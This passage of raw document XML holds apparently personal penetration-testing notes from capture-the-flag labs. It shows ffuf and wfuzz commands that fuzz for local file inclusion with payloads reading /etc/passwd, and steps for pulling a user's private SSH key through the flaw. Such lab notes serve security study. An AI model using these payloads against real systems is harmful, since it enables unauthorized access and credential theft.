      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/secret/evil.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?FUZZ=/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fs 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there is any parameter that allows for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then this fuzz will find it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000116F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-fs 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to filter out any output that has size 0, which would be a blank site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001170">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/secret/evil.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?FUZZ=id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fs 0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001171">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one I haven't seen used, but it could work to find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001172">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we get LFI, then we can see which users are in /etc/passwd. Look for entries in /home, like /home/michael. If you find those users, then you can try and look for their private SSH key, which is that they did in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId344">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One PG Play</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001173">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On firefox, go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.21/secret/evil.php?command=/home/mowree/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001174">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The user we found from /etc/passwd was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mowree</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001175">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get the formatted correct text check the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">view-source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001176">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste the private key into a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001177">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001178">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change ssh Private Key File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001179">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grants read and write permissions to the owner only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the private key is encrypted (as in the EvilBox-One PG Play), then go to the SSH section of this document to learn how to decrypt SSH key. The section is called "Decrypting SSH Key"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the private key doesn't work (like you can't access that directory), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">then you can use LFI specific word lists to look for file paths that you can access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId345">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/LFI\ payloads.txt --hw 0 http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.167.80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/console/file.php?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000117F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1359"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the parameter "file" to whatever your parameter is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001180">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001181">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001182">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001183">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001184">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001185">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -b "NAME1=VALUE1; NAME2=VALUE2" -w wordlist.txt -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId346">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://host.name/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001186">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">here, NAME and VALUE are the names and values of cookies </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001187">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1495"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -b "NAME1=VALUE1" -w wordlist.txt -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId347">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://host.name/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001188">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1495"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you only need one cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001189">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cronos HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I got past an Admin login page. But even without the cookie, I was able to ffuf and look at the directories and files. At least in this case, the cookie wasn't necessary for ffuf. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v78lk212ch8a" w:id="144"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subdomain/virtual host fuzzing (finding subdomains):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000118F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OBSERVE:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In BoardLight HTB, we learned that once you find an email on the website, you have a domain (ex. board.htb). And then you can assume that is a domain and then add it to /etc/hosts and then do subdomain traversal. The cool thing is that it doesn't matter if you misspell board.htb.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, even if we don't know any domain, we can make one up and then subdomain traversal still works if it exists. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
